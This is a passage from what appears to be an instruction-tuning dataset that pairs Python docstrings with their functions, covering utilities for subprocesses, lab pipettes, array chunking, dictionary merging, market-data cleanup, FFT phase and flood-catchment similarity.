Wrap running python script in a subprocess.
Return exit code of the invoked command.
### Response:
def exec_python_rc(*args, **kwargs):
"""
Wrap running python script in a subprocess.
Return exit code of the invoked command.
"""
cmdargs, kwargs = __wrap_python(args, kwargs)
return exec_command_rc(*cmdargs, **kwargs) |
def reset_tip_tracking(self):
"""
Resets the :any:`Pipette` tip tracking, "refilling" the tip racks
"""
self.current_tip(None)
self.tip_rack_iter = iter([])
if self.has_tip_rack():
iterables = self.tip_racks
if self.channels > 1:
iterables = [c for rack in self.tip_racks for c in rack.cols]
else:
iterables = [w for rack in self.tip_racks for w in rack]
if self.starting_tip:
iterables = iterables[iterables.index(self.starting_tip):]
self.tip_rack_iter = itertools.chain(iterables) | Resets the :any:`Pipette` tip tracking, "refilling" the tip racks | Below is the the instruction that describes the task:
### Input:
Resets the :any:`Pipette` tip tracking, "refilling" the tip racks
### Response:
def reset_tip_tracking(self):
"""
Resets the :any:`Pipette` tip tracking, "refilling" the tip racks
"""
self.current_tip(None)
self.tip_rack_iter = iter([])
if self.has_tip_rack():
iterables = self.tip_racks
if self.channels > 1:
iterables = [c for rack in self.tip_racks for c in rack.cols]
else:
iterables = [w for rack in self.tip_racks for w in rack]
if self.starting_tip:
iterables = iterables[iterables.index(self.starting_tip):]
self.tip_rack_iter = itertools.chain(iterables) |
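The bookkeeping boils down to flattening the racks, optionally fast-forwarding to starting_tip, and wrapping the result in itertools.chain. A toy sketch with plain lists standing in for tip racks:

import itertools

tip_racks = [["A1", "A2", "A3"], ["B1", "B2"]]    # stand-ins for labware objects
starting_tip = "A3"

wells = [w for rack in tip_racks for w in rack]
wells = wells[wells.index(starting_tip):]          # skip tips before starting_tip
tip_iter = itertools.chain(wells)

print(next(tip_iter), next(tip_iter))              # A3 B1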
def getplan(self, size="150", axes=None, padding=None):
"""
Identify a plan for chunking values along each dimension.
Generates an ndarray with the size (in number of elements) of chunks
in each dimension. If provided, will estimate chunks for only a
subset of axes, leaving all others to the full size of the axis.
Parameters
----------
size : string or tuple
If str, the average size (in KB) of the chunks in all value dimensions.
If int/tuple, an explicit specification of the number chunks in
each moving value dimension.
axes : tuple, optional, default=None
One or more axes to estimate chunks for, if provided any
other axes will use one chunk.
padding : tuple or int, option, default=None
Size over overlapping padding between chunks in each dimension.
If tuple, specifies padding along each chunked dimension; if int,
all dimensions use same padding; if None, no padding
"""
from numpy import dtype as gettype
# initialize with all elements in one chunk
plan = self.vshape
# check for subset of axes
if axes is None:
if isinstance(size, str):
axes = arange(len(self.vshape))
else:
axes = arange(len(size))
else:
axes = asarray(axes, 'int')
# set padding
pad = array(len(self.vshape)*[0, ])
if padding is not None:
pad[axes] = padding
# set the plan
if isinstance(size, tuple):
plan[axes] = size
elif isinstance(size, str):
# convert from kilobytes
size = 1000.0 * float(size)
# calculate from dtype
elsize = gettype(self.dtype).itemsize
nelements = prod(self.vshape)
dims = self.vshape[self.vmask(axes)]
if size <= elsize:
s = ones(len(axes))
else:
remsize = 1.0 * nelements * elsize
s = []
for (i, d) in enumerate(dims):
minsize = remsize/d
if minsize >= size:
s.append(1)
remsize = minsize
continue
else:
s.append(min(d, floor(size/minsize)))
s[i+1:] = plan[i+1:]
break
plan[axes] = s
else:
raise ValueError("Chunk size not understood, must be tuple or int")
return plan, pad | Identify a plan for chunking values along each dimension.
Generates an ndarray with the size (in number of elements) of chunks
in each dimension. If provided, will estimate chunks for only a
subset of axes, leaving all others to the full size of the axis.
Parameters
----------
size : string or tuple
If str, the average size (in KB) of the chunks in all value dimensions.
If int/tuple, an explicit specification of the number chunks in
each moving value dimension.
axes : tuple, optional, default=None
One or more axes to estimate chunks for, if provided any
other axes will use one chunk.
padding : tuple or int, option, default=None
Size over overlapping padding between chunks in each dimension.
If tuple, specifies padding along each chunked dimension; if int,
all dimensions use same padding; if None, no padding | Below is the the instruction that describes the task:
### Input:
Identify a plan for chunking values along each dimension.
Generates an ndarray with the size (in number of elements) of chunks
in each dimension. If provided, will estimate chunks for only a
subset of axes, leaving all others to the full size of the axis.
Parameters
----------
size : string or tuple
If str, the average size (in KB) of the chunks in all value dimensions.
If int/tuple, an explicit specification of the number chunks in
each moving value dimension.
axes : tuple, optional, default=None
One or more axes to estimate chunks for, if provided any
other axes will use one chunk.
padding : tuple or int, option, default=None
Size over overlapping padding between chunks in each dimension.
If tuple, specifies padding along each chunked dimension; if int,
all dimensions use same padding; if None, no padding
### Response:
def getplan(self, size="150", axes=None, padding=None):
"""
Identify a plan for chunking values along each dimension.
Generates an ndarray with the size (in number of elements) of chunks
in each dimension. If provided, will estimate chunks for only a
subset of axes, leaving all others to the full size of the axis.
Parameters
----------
size : string or tuple
If str, the average size (in KB) of the chunks in all value dimensions.
If int/tuple, an explicit specification of the number chunks in
each moving value dimension.
axes : tuple, optional, default=None
One or more axes to estimate chunks for, if provided any
other axes will use one chunk.
padding : tuple or int, option, default=None
Size over overlapping padding between chunks in each dimension.
If tuple, specifies padding along each chunked dimension; if int,
all dimensions use same padding; if None, no padding
"""
from numpy import dtype as gettype
# initialize with all elements in one chunk
plan = self.vshape
# check for subset of axes
if axes is None:
if isinstance(size, str):
axes = arange(len(self.vshape))
else:
axes = arange(len(size))
else:
axes = asarray(axes, 'int')
# set padding
pad = array(len(self.vshape)*[0, ])
if padding is not None:
pad[axes] = padding
# set the plan
if isinstance(size, tuple):
plan[axes] = size
elif isinstance(size, str):
# convert from kilobytes
size = 1000.0 * float(size)
# calculate from dtype
elsize = gettype(self.dtype).itemsize
nelements = prod(self.vshape)
dims = self.vshape[self.vmask(axes)]
if size <= elsize:
s = ones(len(axes))
else:
remsize = 1.0 * nelements * elsize
s = []
for (i, d) in enumerate(dims):
minsize = remsize/d
if minsize >= size:
s.append(1)
remsize = minsize
continue
else:
s.append(min(d, floor(size/minsize)))
s[i+1:] = plan[i+1:]
break
plan[axes] = s
else:
raise ValueError("Chunk size not understood, must be tuple or int")
return plan, pad |
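The string branch is easiest to follow with concrete numbers. Below is a simplified, standalone re-rendering of that loop (no padding, every value axis chunkable, ignoring the size <= elsize corner case), not the library code itself:

from math import floor, prod

def plan_chunks(vshape, itemsize, target_bytes):
    # simplified re-rendering of getplan's string branch
    plan = list(vshape)
    remsize = float(prod(vshape)) * itemsize      # bytes still to be split up
    for i, d in enumerate(vshape):
        minsize = remsize / d                     # bytes per chunk if this axis is fully split
        if minsize >= target_bytes:
            plan[i] = 1                           # split this axis completely, keep going
            remsize = minsize
        else:
            plan[i] = min(d, int(floor(target_bytes / minsize)))
            break                                 # remaining axes stay at full size
    return tuple(plan)

print(plan_chunks((1000, 500, 200), 8, 150e3))    # (1, 93, 200): 1*93*200*8 bytes, about 149 kB per chunk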
def merge_dicts(dicts, deepcopy=False):
"""Merges dicts
In case of key conflicts, the value kept will be from the latter
dictionary in the list of dictionaries
:param dicts: [dict, ...]
:param deepcopy: deepcopy items within dicts
"""
assert isinstance(dicts, list) and all(isinstance(d, dict) for d in dicts)
return dict(chain(*[copy.deepcopy(d).items() if deepcopy else d.items()
for d in dicts])) | Merges dicts
In case of key conflicts, the value kept will be from the latter
dictionary in the list of dictionaries
:param dicts: [dict, ...]
:param deepcopy: deepcopy items within dicts | Below is the the instruction that describes the task:
### Input:
Merges dicts
In case of key conflicts, the value kept will be from the latter
dictionary in the list of dictionaries
:param dicts: [dict, ...]
:param deepcopy: deepcopy items within dicts
### Response:
def merge_dicts(dicts, deepcopy=False):
"""Merges dicts
In case of key conflicts, the value kept will be from the latter
dictionary in the list of dictionaries
:param dicts: [dict, ...]
:param deepcopy: deepcopy items within dicts
"""
assert isinstance(dicts, list) and all(isinstance(d, dict) for d in dicts)
return dict(chain(*[copy.deepcopy(d).items() if deepcopy else d.items()
for d in dicts])) |
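With the function above in scope, a short demonstration of the conflict rule (later dictionaries win) and of what deepcopy buys:

a = {"x": 1, "nested": {"k": []}}
b = {"x": 2}

merged = merge_dicts([a, b], deepcopy=True)
print(merged["x"])          # 2 -> value from the later dict wins

merged["nested"]["k"].append("only in the copy")
print(a["nested"]["k"])     # [] -> original untouched because deepcopy=True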
def to_interval_values(self):
'''Extract observation data in a `mir_eval`-friendly format.
Returns
-------
intervals : np.ndarray [shape=(n, 2), dtype=float]
Start- and end-times of all valued intervals
`intervals[i, :] = [time[i], time[i] + duration[i]]`
labels : list
List view of value field.
'''
ints, vals = [], []
for obs in self.data:
ints.append([obs.time, obs.time + obs.duration])
vals.append(obs.value)
if not ints:
return np.empty(shape=(0, 2), dtype=float), []
return np.array(ints), vals | Extract observation data in a `mir_eval`-friendly format.
Returns
-------
intervals : np.ndarray [shape=(n, 2), dtype=float]
Start- and end-times of all valued intervals
`intervals[i, :] = [time[i], time[i] + duration[i]]`
labels : list
List view of value field. | Below is the the instruction that describes the task:
### Input:
Extract observation data in a `mir_eval`-friendly format.
Returns
-------
intervals : np.ndarray [shape=(n, 2), dtype=float]
Start- and end-times of all valued intervals
`intervals[i, :] = [time[i], time[i] + duration[i]]`
labels : list
List view of value field.
### Response:
def to_interval_values(self):
'''Extract observation data in a `mir_eval`-friendly format.
Returns
-------
intervals : np.ndarray [shape=(n, 2), dtype=float]
Start- and end-times of all valued intervals
`intervals[i, :] = [time[i], time[i] + duration[i]]`
labels : list
List view of value field.
'''
ints, vals = [], []
for obs in self.data:
ints.append([obs.time, obs.time + obs.duration])
vals.append(obs.value)
if not ints:
return np.empty(shape=(0, 2), dtype=float), []
return np.array(ints), vals |
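The observation objects are not shown in this record; each needs time, duration and value fields. A toy reconstruction with a namedtuple standing in for the real observation type, just to show the output shape:

from collections import namedtuple
import numpy as np

Obs = namedtuple("Obs", ["time", "duration", "value"])   # stand-in for the real observation class
data = [Obs(0.0, 0.5, "N"), Obs(0.5, 1.0, "C:maj")]

ints = np.array([[o.time, o.time + o.duration] for o in data])
vals = [o.value for o in data]
print(ints)   # [[0.  0.5]
              #  [0.5 1.5]]
print(vals)   # ['N', 'C:maj']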
def is_measure(self):
"""Return true if the colum is a dimension"""
from ambry.valuetype.core import ROLE
return self.role == ROLE.MEASURE | Return true if the colum is a dimension | Below is the the instruction that describes the task:
### Input:
Return true if the colum is a dimension
### Response:
def is_measure(self):
"""Return true if the colum is a dimension"""
from ambry.valuetype.core import ROLE
return self.role == ROLE.MEASURE |
def _fix_history_sequence(self, df, table):
""" fix out-of-sequence ticks/bars """
# remove "Unnamed: x" columns
cols = df.columns[df.columns.str.startswith('Unnamed:')].tolist()
df.drop(cols, axis=1, inplace=True)
# remove future dates
df['datetime'] = pd.to_datetime(df['datetime'], utc=True)
blacklist = df[df['datetime'] > pd.to_datetime('now', utc=True)]
df = df.loc[set(df.index) - set(blacklist)] # .tail()
# loop through data, symbol by symbol
dfs = []
bad_ids = [blacklist['id'].values.tolist()]
for symbol_id in list(df['symbol_id'].unique()):
data = df[df['symbol_id'] == symbol_id].copy()
# sort by id
data.sort_values('id', axis=0, ascending=True, inplace=False)
# convert index to column
data.loc[:, "ix"] = data.index
data.reset_index(inplace=True)
# find out of sequence ticks/bars
malformed = data.shift(1)[(data['id'] > data['id'].shift(1)) & (
data['datetime'] < data['datetime'].shift(1))]
# cleanup rows
if malformed.empty:
# if all rows are in sequence, just remove last row
dfs.append(data)
else:
# remove out of sequence rows + last row from data
index = [
x for x in data.index.values if x not in malformed['ix'].values]
dfs.append(data.loc[index])
# add to bad id list (to remove from db)
bad_ids.append(list(malformed['id'].values))
# combine all lists
data = pd.concat(dfs, sort=True)
# flatten bad ids
bad_ids = sum(bad_ids, [])
# remove bad ids from db
if bad_ids:
bad_ids = list(map(str, map(int, bad_ids)))
self.dbcurr.execute("DELETE FROM greeks WHERE %s IN (%s)" % (
table.lower()[:-1] + "_id", ",".join(bad_ids)))
self.dbcurr.execute("DELETE FROM " + table.lower() +
" WHERE id IN (%s)" % (",".join(bad_ids)))
try:
self.dbconn.commit()
except Exception as e:
self.dbconn.rollback()
# return
return data.drop(['id', 'ix', 'index'], axis=1) | fix out-of-sequence ticks/bars | Below is the the instruction that describes the task:
### Input:
fix out-of-sequence ticks/bars
### Response:
def _fix_history_sequence(self, df, table):
""" fix out-of-sequence ticks/bars """
# remove "Unnamed: x" columns
cols = df.columns[df.columns.str.startswith('Unnamed:')].tolist()
df.drop(cols, axis=1, inplace=True)
# remove future dates
df['datetime'] = pd.to_datetime(df['datetime'], utc=True)
blacklist = df[df['datetime'] > pd.to_datetime('now', utc=True)]
df = df.loc[set(df.index) - set(blacklist)] # .tail()
# loop through data, symbol by symbol
dfs = []
bad_ids = [blacklist['id'].values.tolist()]
for symbol_id in list(df['symbol_id'].unique()):
data = df[df['symbol_id'] == symbol_id].copy()
# sort by id
data.sort_values('id', axis=0, ascending=True, inplace=False)
# convert index to column
data.loc[:, "ix"] = data.index
data.reset_index(inplace=True)
# find out of sequence ticks/bars
malformed = data.shift(1)[(data['id'] > data['id'].shift(1)) & (
data['datetime'] < data['datetime'].shift(1))]
# cleanup rows
if malformed.empty:
# if all rows are in sequence, just remove last row
dfs.append(data)
else:
# remove out of sequence rows + last row from data
index = [
x for x in data.index.values if x not in malformed['ix'].values]
dfs.append(data.loc[index])
# add to bad id list (to remove from db)
bad_ids.append(list(malformed['id'].values))
# combine all lists
data = pd.concat(dfs, sort=True)
# flatten bad ids
bad_ids = sum(bad_ids, [])
# remove bad ids from db
if bad_ids:
bad_ids = list(map(str, map(int, bad_ids)))
self.dbcurr.execute("DELETE FROM greeks WHERE %s IN (%s)" % (
table.lower()[:-1] + "_id", ",".join(bad_ids)))
self.dbcurr.execute("DELETE FROM " + table.lower() +
" WHERE id IN (%s)" % (",".join(bad_ids)))
try:
self.dbconn.commit()
except Exception as e:
self.dbconn.rollback()
# return
return data.drop(['id', 'ix', 'index'], axis=1) |
def strip_br(s):
r""" Strip the trailing html linebreak character (<BR />) from a string or sequence of strings
A sequence of strings is assumed to be a row in a CSV/TSV file or words from a line of text
so only the last element in a sequence is "stripped"
>>> strip_br(' Title <BR> ')
' Title'
>>> strip_br(list(range(1, 4)))
[1, 2, 3]
>>> strip_br((' Column 1<br />', ' Last Column < br / > '))
(' Column 1<br />', ' Last Column')
>>> strip_br(['name', 'rank', 'serial\nnumber', 'date <BR />'])
['name', 'rank', 'serial\nnumber', 'date']
>>> strip_br(None)
>>> strip_br([])
[]
>>> strip_br(())
()
>>> strip_br(('one element<br>',))
('one element',)
"""
if isinstance(s, basestring):
return re.sub(r'\s*<\s*[Bb][Rr]\s*[/]?\s*>\s*$', '', s)
elif isinstance(s, (tuple, list)):
# strip just the last element in a list or tuple
try:
return type(s)(list(s)[:-1] + [strip_br(s[-1])])
except (IndexError, ValueError, AttributeError, TypeError): # len(s) == 0
return s
else:
try:
return type(s)(strip_br(str(s)))
except (IndexError, ValueError, AttributeError, TypeError): # s is None
return s | r""" Strip the trailing html linebreak character (<BR />) from a string or sequence of strings
A sequence of strings is assumed to be a row in a CSV/TSV file or words from a line of text
so only the last element in a sequence is "stripped"
>>> strip_br(' Title <BR> ')
' Title'
>>> strip_br(list(range(1, 4)))
[1, 2, 3]
>>> strip_br((' Column 1<br />', ' Last Column < br / > '))
(' Column 1<br />', ' Last Column')
>>> strip_br(['name', 'rank', 'serial\nnumber', 'date <BR />'])
['name', 'rank', 'serial\nnumber', 'date']
>>> strip_br(None)
>>> strip_br([])
[]
>>> strip_br(())
()
>>> strip_br(('one element<br>',))
('one element',) | Below is the the instruction that describes the task:
### Input:
r""" Strip the trailing html linebreak character (<BR />) from a string or sequence of strings
A sequence of strings is assumed to be a row in a CSV/TSV file or words from a line of text
so only the last element in a sequence is "stripped"
>>> strip_br(' Title <BR> ')
' Title'
>>> strip_br(list(range(1, 4)))
[1, 2, 3]
>>> strip_br((' Column 1<br />', ' Last Column < br / > '))
(' Column 1<br />', ' Last Column')
>>> strip_br(['name', 'rank', 'serial\nnumber', 'date <BR />'])
['name', 'rank', 'serial\nnumber', 'date']
>>> strip_br(None)
>>> strip_br([])
[]
>>> strip_br(())
()
>>> strip_br(('one element<br>',))
('one element',)
### Response:
def strip_br(s):
r""" Strip the trailing html linebreak character (<BR />) from a string or sequence of strings
A sequence of strings is assumed to be a row in a CSV/TSV file or words from a line of text
so only the last element in a sequence is "stripped"
>>> strip_br(' Title <BR> ')
' Title'
>>> strip_br(list(range(1, 4)))
[1, 2, 3]
>>> strip_br((' Column 1<br />', ' Last Column < br / > '))
(' Column 1<br />', ' Last Column')
>>> strip_br(['name', 'rank', 'serial\nnumber', 'date <BR />'])
['name', 'rank', 'serial\nnumber', 'date']
>>> strip_br(None)
>>> strip_br([])
[]
>>> strip_br(())
()
>>> strip_br(('one element<br>',))
('one element',)
"""
if isinstance(s, basestring):
return re.sub(r'\s*<\s*[Bb][Rr]\s*[/]?\s*>\s*$', '', s)
elif isinstance(s, (tuple, list)):
# strip just the last element in a list or tuple
try:
return type(s)(list(s)[:-1] + [strip_br(s[-1])])
except (IndexError, ValueError, AttributeError, TypeError): # len(s) == 0
return s
else:
try:
return type(s)(strip_br(str(s)))
except (IndexError, ValueError, AttributeError, TypeError): # s is None
return s |
def fftp(wave, npoints=None, indep_min=None, indep_max=None, unwrap=True, rad=True):
r"""
Return the phase of the Fast Fourier Transform of a waveform.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:param unwrap: Flag that indicates whether phase should change phase shifts
to their :code:`2*pi` complement (True) or not (False)
:type unwrap: boolean
:param rad: Flag that indicates whether phase should be returned in radians
(True) or degrees (False)
:type rad: boolean
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.fftp
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`rad\` is not valid)
* RuntimeError (Argument \`unwrap\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform sampling)
.. [[[end]]]
"""
return phase(fft(wave, npoints, indep_min, indep_max), unwrap=unwrap, rad=rad) | r"""
Return the phase of the Fast Fourier Transform of a waveform.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:param unwrap: Flag that indicates whether phase should change phase shifts
to their :code:`2*pi` complement (True) or not (False)
:type unwrap: boolean
:param rad: Flag that indicates whether phase should be returned in radians
(True) or degrees (False)
:type rad: boolean
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.fftp
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`rad\` is not valid)
* RuntimeError (Argument \`unwrap\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform sampling)
.. [[[end]]] | Below is the the instruction that describes the task:
### Input:
r"""
Return the phase of the Fast Fourier Transform of a waveform.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:param unwrap: Flag that indicates whether phase should change phase shifts
to their :code:`2*pi` complement (True) or not (False)
:type unwrap: boolean
:param rad: Flag that indicates whether phase should be returned in radians
(True) or degrees (False)
:type rad: boolean
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.fftp
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`rad\` is not valid)
* RuntimeError (Argument \`unwrap\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform sampling)
.. [[[end]]]
### Response:
def fftp(wave, npoints=None, indep_min=None, indep_max=None, unwrap=True, rad=True):
r"""
Return the phase of the Fast Fourier Transform of a waveform.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:param unwrap: Flag that indicates whether phase should change phase shifts
to their :code:`2*pi` complement (True) or not (False)
:type unwrap: boolean
:param rad: Flag that indicates whether phase should be returned in radians
(True) or degrees (False)
:type rad: boolean
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.fftp
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`rad\` is not valid)
* RuntimeError (Argument \`unwrap\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform sampling)
.. [[[end]]]
"""
return phase(fft(wave, npoints, indep_min, indep_max), unwrap=unwrap, rad=rad) |
def norm(table):
"""
fit to normal distribution
"""
print('# norm dist is broken', file=sys.stderr)
exit()
from matplotlib.pyplot import hist as hist
t = []
for i in table:
t.append(np.ndarray.tolist(hist(i, bins = len(i), normed = True)[0]))
return t | fit to normal distribution | Below is the the instruction that describes the task:
### Input:
fit to normal distribution
### Response:
def norm(table):
"""
fit to normal distribution
"""
print('# norm dist is broken', file=sys.stderr)
exit()
from matplotlib.pyplot import hist as hist
t = []
for i in table:
t.append(np.ndarray.tolist(hist(i, bins = len(i), normed = True)[0]))
return t |
def char_width(char):
"""
Get the display length of a unicode character.
"""
if ord(char) < 128:
return 1
elif unicodedata.east_asian_width(char) in ('F', 'W'):
return 2
elif unicodedata.category(char) in ('Mn',):
return 0
else:
return 1 | Get the display length of a unicode character. | Below is the the instruction that describes the task:
### Input:
Get the display length of a unicode character.
### Response:
def char_width(char):
"""
Get the display length of a unicode character.
"""
if ord(char) < 128:
return 1
elif unicodedata.east_asian_width(char) in ('F', 'W'):
return 2
elif unicodedata.category(char) in ('Mn',):
return 0
else:
return 1 |
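A small self-check for the char_width row above; the sample characters are illustrative and char_width refers to the definition given in this row.

import unicodedata  # required by char_width above

assert char_width('A') == 1       # ASCII -> width 1
assert char_width('漢') == 2      # East Asian wide ('W') -> width 2
assert char_width('\u0301') == 0  # combining acute accent (category 'Mn') -> width 0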
def most_similar_catchments(self, subject_catchment, similarity_dist_function, records_limit=500,
include_subject_catchment='auto'):
"""
Return a list of catchments sorted by hydrological similarity defined by `similarity_distance_function`
:param subject_catchment: subject catchment to find similar catchments for
:type subject_catchment: :class:`floodestimation.entities.Catchment`
:param similarity_dist_function: a method returning a similarity distance measure with 2 arguments, both
:class:`floodestimation.entities.Catchment` objects
:param include_subject_catchment: - `auto`: include subject catchment if suitable for pooling and if urbext < 0.03
- `force`: always include subject catchment having at least 10 years of data
- `exclude`: do not include the subject catchment
:type include_subject_catchment: str
:return: list of catchments sorted by similarity
:type: list of :class:`floodestimation.entities.Catchment`
"""
if include_subject_catchment not in ['auto', 'force', 'exclude']:
raise ValueError("Parameter `include_subject_catchment={}` invalid.".format(include_subject_catchment) +
"Must be one of `auto`, `force` or `exclude`.")
query = (self.db_session.query(Catchment).
join(Catchment.descriptors).
join(Catchment.amax_records).
filter(Catchment.id != subject_catchment.id,
Catchment.is_suitable_for_pooling,
or_(Descriptors.urbext2000 < 0.03, Descriptors.urbext2000 == None),
AmaxRecord.flag == 0).
group_by(Catchment).
having(func.count(AmaxRecord.catchment_id) >= 10)) # At least 10 AMAX records
catchments = query.all()
        # Add subject catchment if required (may not exist in database, so add after querying db)
if include_subject_catchment == 'force':
if len(subject_catchment.amax_records) >= 10: # Never include short-record catchments
catchments.append(subject_catchment)
elif include_subject_catchment == 'auto':
if len(subject_catchment.amax_records) >= 10 and subject_catchment.is_suitable_for_pooling and \
(subject_catchment.descriptors.urbext2000 < 0.03 or subject_catchment.descriptors.urbext2000 is None):
catchments.append(subject_catchment)
# Store the similarity distance as an additional attribute for each catchment
for catchment in catchments:
catchment.similarity_dist = similarity_dist_function(subject_catchment, catchment)
# Then simply sort by this attribute
catchments.sort(key=attrgetter('similarity_dist'))
# Limit catchments until total amax_records counts is at least `records_limit`, default 500
amax_records_count = 0
catchments_limited = []
for catchment in catchments:
catchments_limited.append(catchment)
amax_records_count += catchment.record_length
if amax_records_count >= records_limit:
break
return catchments_limited | Return a list of catchments sorted by hydrological similarity defined by `similarity_distance_function`
:param subject_catchment: subject catchment to find similar catchments for
:type subject_catchment: :class:`floodestimation.entities.Catchment`
:param similarity_dist_function: a method returning a similarity distance measure with 2 arguments, both
:class:`floodestimation.entities.Catchment` objects
:param include_subject_catchment: - `auto`: include subject catchment if suitable for pooling and if urbext < 0.03
- `force`: always include subject catchment having at least 10 years of data
- `exclude`: do not include the subject catchment
:type include_subject_catchment: str
:return: list of catchments sorted by similarity
:type: list of :class:`floodestimation.entities.Catchment` | Below is the the instruction that describes the task:
### Input:
Return a list of catchments sorted by hydrological similarity defined by `similarity_distance_function`
:param subject_catchment: subject catchment to find similar catchments for
:type subject_catchment: :class:`floodestimation.entities.Catchment`
:param similarity_dist_function: a method returning a similarity distance measure with 2 arguments, both
:class:`floodestimation.entities.Catchment` objects
:param include_subject_catchment: - `auto`: include subject catchment if suitable for pooling and if urbext < 0.03
- `force`: always include subject catchment having at least 10 years of data
- `exclude`: do not include the subject catchment
:type include_subject_catchment: str
:return: list of catchments sorted by similarity
:type: list of :class:`floodestimation.entities.Catchment`
### Response:
def most_similar_catchments(self, subject_catchment, similarity_dist_function, records_limit=500,
include_subject_catchment='auto'):
"""
Return a list of catchments sorted by hydrological similarity defined by `similarity_distance_function`
:param subject_catchment: subject catchment to find similar catchments for
:type subject_catchment: :class:`floodestimation.entities.Catchment`
:param similarity_dist_function: a method returning a similarity distance measure with 2 arguments, both
:class:`floodestimation.entities.Catchment` objects
:param include_subject_catchment: - `auto`: include subject catchment if suitable for pooling and if urbext < 0.03
- `force`: always include subject catchment having at least 10 years of data
- `exclude`: do not include the subject catchment
:type include_subject_catchment: str
:return: list of catchments sorted by similarity
:type: list of :class:`floodestimation.entities.Catchment`
"""
if include_subject_catchment not in ['auto', 'force', 'exclude']:
raise ValueError("Parameter `include_subject_catchment={}` invalid.".format(include_subject_catchment) +
"Must be one of `auto`, `force` or `exclude`.")
query = (self.db_session.query(Catchment).
join(Catchment.descriptors).
join(Catchment.amax_records).
filter(Catchment.id != subject_catchment.id,
Catchment.is_suitable_for_pooling,
or_(Descriptors.urbext2000 < 0.03, Descriptors.urbext2000 == None),
AmaxRecord.flag == 0).
group_by(Catchment).
having(func.count(AmaxRecord.catchment_id) >= 10)) # At least 10 AMAX records
catchments = query.all()
        # Add subject catchment if required (may not exist in database, so add after querying db)
if include_subject_catchment == 'force':
if len(subject_catchment.amax_records) >= 10: # Never include short-record catchments
catchments.append(subject_catchment)
elif include_subject_catchment == 'auto':
if len(subject_catchment.amax_records) >= 10 and subject_catchment.is_suitable_for_pooling and \
(subject_catchment.descriptors.urbext2000 < 0.03 or subject_catchment.descriptors.urbext2000 is None):
catchments.append(subject_catchment)
# Store the similarity distance as an additional attribute for each catchment
for catchment in catchments:
catchment.similarity_dist = similarity_dist_function(subject_catchment, catchment)
# Then simply sort by this attribute
catchments.sort(key=attrgetter('similarity_dist'))
# Limit catchments until total amax_records counts is at least `records_limit`, default 500
amax_records_count = 0
catchments_limited = []
for catchment in catchments:
catchments_limited.append(catchment)
amax_records_count += catchment.record_length
if amax_records_count >= records_limit:
break
return catchments_limited |
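The method above only requires that similarity_dist_function accept two Catchment objects and return a number. Below is a hypothetical callable of that shape, built on the urbext2000 descriptor already referenced by the query; it illustrates the expected signature and is not one of the package's own similarity measures.

def urbext_distance(subject, candidate):
    # Illustrative only: absolute difference in urbext2000, treating a
    # missing descriptor as 0.0.
    s = subject.descriptors.urbext2000 or 0.0
    c = candidate.descriptors.urbext2000 or 0.0
    return abs(s - c)

# e.g. collection.most_similar_catchments(subject_catchment, urbext_distance, records_limit=500)
# where `collection` is an instance of the class that defines the method above.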
def __draw_constant_line(self, value_label_style):
"Draw a constant line on the y-axis with the label"
value, label, style = value_label_style
start = self.transform_output_coordinates((0, value))[1]
stop = self.graph_width
path = etree.SubElement(self.graph, 'path', {
